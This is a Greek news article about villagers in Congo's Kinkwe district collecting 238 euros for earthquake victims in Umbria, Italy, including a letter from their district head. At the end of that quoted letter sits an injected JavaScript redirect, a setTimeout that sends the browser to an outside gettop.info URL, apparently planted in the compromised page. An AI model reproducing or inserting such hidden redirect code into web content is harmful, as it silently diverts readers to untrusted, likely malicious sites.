Το Κονγκό στηρίζει τους σεισμοπαθείς της Ιταλίας!

0
16

 

Συγκίνηση προκαλεί η πρωτοβουλία που ανέλαβαν οι κάτοικοι 30 χωριών της περιφέρειας Κινγκουέ του Κονγκό οι οποίοι κατάφεραν να συγκεντρώσουν 238 ευρώ για να στηρίξουν τους σεισμοπαθείς της περιφέρειας Ούμπρια, στην κεντρική Ιταλία, παράτη δική τους φτώχεια!

Η ιδέα ξεκίνησε από έναν καθολικό ιερέα που εργάζεται εδώ και χρόνια στο Κονγκό με την εθελοντική οργάνωση Multisolidariet. Αυτός μίλησε στους κατοίκους του Κιγκουέ και τους περιέγραψε τις καταστρεπτικές συνέπειες των σεισμών που έπληξαν την κεντρική Ιταλία τον περασμένο Αύγουστο και Οκτώβριο. Όλοι μαζί αποφάσισαν να βοηθήσουν, στο μέτρο του δυνατού, τους άστεγους της Ούμπρια.

Έπειτα από πάνω από δυο μήνες προσπαθειών, μπόρεσαν να συγκεντρώσουν 238 ευρώ, ποσό πολύ μεγάλο για αυτούς τους ανθρώπους που ζουν μόνο από την καλλιέργεια της γης και μικρής έκτασης κτηνοτροφία, κάτι που προκαλεί συγκίνηση με την ένδειξη ανθρωπιάς και μεγαλείου ψυχής τους.

Τα χρήματα εστάλησαν στην Ιταλία μαζί με μια επιστολή του υπεύθυνου της περιφέρειας του Κιγκουέ, του Ντανιέλ Μουανγουέια: «Μας άγγιξε ιδιαίτερα η είδηση και το πένθος που προκάλεσαν οι σεισμοί στη χώρα σας και στην περιφέρεια της Ούμπρια. Πολλοί Ιταλοί μας βοηθούν συνεχώς με πρωτοβουλίες κοινωνικού χαρακτήρα και θελήσαμε και εμείς να συλλέξουμε ένα πολύ μικρό χρηματικό ποσό για να μπορέσουμε να εκφράσουμε έμπρακτα την αλληλεγγύη μας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here